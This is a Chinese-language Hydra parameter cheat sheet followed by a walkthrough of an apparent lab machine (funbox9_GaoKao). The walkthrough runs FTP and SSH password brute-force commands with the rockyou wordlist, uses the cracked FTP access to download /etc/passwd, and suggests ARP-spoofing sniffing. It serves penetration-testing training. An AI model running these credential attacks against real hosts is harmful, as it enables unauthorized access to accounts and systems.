Hydra 参数

hydra <参数> <IP地址> <服务名>

参数	案例	说明
-l	-l root	登录账号
-L	-L userName.txt	用户文件
-p	-l 123456	登录密码
-P	-P passwd.txt	密码文件
-e	-e nsr	n 空密码 s 用户名即密码 r 用户名和密码相反（如root的密码为toor）
-s	-s 21	指定端口
-R	-R	继续上一次的进度开始爆破
-t	-t 10	设置线程数
-vV	-vV	显示详细过程
-o	-o flag.txt	将结果输出到文件
-u	-u	循环用户，不循环密码

案例说明（funbox9_GaoKao）

hydra 暴力破解FTP文件服务

ftp 利用思路：

1.ftp是明文传输，可以去嗅探获取登录凭证，嗅探传输的文件，可以使用中间人攻击（如ARP欺骗)实时流量劫持进行嗅探
2. 密码爆破
3.匿名访问
4.查找FTP应用有没有公开的漏洞

1.获取目标主机IP

arp-scan -l -I eth1
通过arp-scan 工具继续网络探索，找到目标主机

ftp 172.30.1.128
发现有个用户名为sky的我们可以尝试使用sky这个用户名进行爆破

cd /usr/share/wordlists/
找到我们kail自带的一个密码字典rockyou
我们发现是个gz格式的压缩文件需要解压
gunzip -k rockyou.txt.gz
-k 保留原文件

hydra -l sky -P /usr/share/wordlists/rockyou.txt ftp://172.30.1.28
对ftp服务进行爆破,我们发现sky用户的密码为thebest

ftp 172.30.1.128
尝试使用sky用户登录
pwd ：查看当前目录
发现ftp没有做chroot隔离，这样我们就可以获取根目录下的所有文件，我们获取passwd文件进行下载

查看我们下载好的passwd文件
我们发现有其他用户的信息，我们可以尝试对其他用户进行ssh爆破
sarah，lucy，sky，root

对sarah，lucy，sky，root用户进行爆破
cat <<ETT>> userName.txt
当输入到ETT时结束，并把之前输入的内容显示并写入到userName.txt这个文件中

hydra -u -e nsr -L userName.txt -P /usr/share/wordlists/rockyou.txt -o flag.txt -t 10 ssh://172.30.1.128
–t 10 在进行ssh爆破时要把线程数降低改成10